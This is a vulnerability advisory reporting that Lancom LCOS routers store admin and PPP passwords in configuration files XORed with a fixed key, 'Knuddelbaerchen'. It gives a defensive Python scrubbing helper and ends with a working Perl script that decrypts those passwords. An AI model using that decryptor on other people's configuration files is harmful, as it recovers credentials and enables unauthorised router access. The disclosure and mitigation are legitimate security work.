Sorry for the late re-discovery - the issue was found and reported in 2009, but had been accidentally buried on my side, and was only re-discovered in late 2016.
Systems affected: all routers running LCOS before v9.x (confirmed by Lancom)
{Secrets} 2.1 == 2f1b18091d
The secret is decrypted by simply XORing it byte-wise with the hardcoded string "Knuddelbaerchen" (which is German for "cuddly baby bear").
BUT:
@sur5r reported that the bug is still valid on a LANCOM R883+ with firmware 10.12.0442 (20.07.2018) and affects PPP and admin passwords.
Please update to a newer model and handle existing configuration files with care as advised in the manual's Security Checklist (and the "Workaround" section below).
Thank you to Lancom for quickly responding and resolving the issue (Support-ID 1609.2312.0000.KSCH).
When forwarding a configuration file to support, vendors or consultants, please remove the {Secrets} section (especially the key 2.1).
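The workaround above, as an added example (not part of the original advisory and not Lancom's code): a Python helper that drops the {Secrets} section from a configuration file before it is forwarded and reports which entries were only XOR-obfuscated, so the matching passwords can be rotated. The file layout ("{Name}" headers on their own line, "key == hexvalue" entries), the function names and the sample file are assumptions; only the key and the 2.1 entry come from this page.

```python
import re

KEY = b"Knuddelbaerchen"  # fixed XOR key named in this advisory
# Assumed layout: "{Name}" section headers on their own line, "key == hexvalue" entries.
SECTION = re.compile(r"^\{([^}]+)\}\s*$")
ENTRY = re.compile(r"^\s*(\S+)\s*==\s*([0-9A-Fa-f]+)\s*$")

def recoverable(hexval):
    """True if XOR with the fixed key yields printable ASCII (value is only obfuscated)."""
    try:
        raw = bytes.fromhex(hexval)
    except ValueError:          # odd length or non-hex: not in the obfuscated format
        return False
    plain = bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(raw))
    return bool(plain) and all(0x20 <= c < 0x7F for c in plain)

def scrub(config_text):
    """Drop the {Secrets} section; return (scrubbed_text, [(entry, length), ...]).

    The findings name entries whose passwords should be treated as exposed
    wherever an unscrubbed copy of the file has been; plaintext is never returned.
    """
    kept, findings, in_secrets = [], [], False
    for line in config_text.splitlines():
        header = SECTION.match(line)
        if header:
            in_secrets = header.group(1).strip().lower() == "secrets"
        if in_secrets:
            entry = ENTRY.match(line)
            if entry and recoverable(entry.group(2)):
                findings.append((entry.group(1), len(entry.group(2)) // 2))
            continue            # header and every line of the section are dropped
        kept.append(line)
    return "\n".join(kept) + "\n", findings

# Constructed sample: only the {Secrets} entry is taken from the advisory.
SAMPLE = """{Info}
name == example-router
{Secrets}
2.1 == 2f1b18091d
{Setup}
location == lab
"""

if __name__ == "__main__":
    text, found = scrub(SAMPLE)
    print(text, end="")
    for entry, length in found:
        print(f"rotate: entry {entry} ({length} bytes) is reversible with the fixed key")
```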
#!/usr/bin/perl -w
#----------------------------------------------------------------------
#
# ./lancom-pw-decrypt.pl ....pw....

$key="Knuddelbaerchen";
$text = pack('H*',$ARGV[0]);                        # hex string from the config -> raw bytes
$len = length($text);
$xlen = int((length($text) / length($key))+1);      # repeat count so the key covers the input
$result = $text ^ ($key x $xlen);                   # byte-wise XOR with the repeated key
$result = substr($result,0,$len);                   # trim to the input length
print "$result\n";

#----------------------------------------------------------------------
# 2009/2016
# https://www.wyae.de/volker.tanger/vuln/lancom_password_knuddelbaerchen/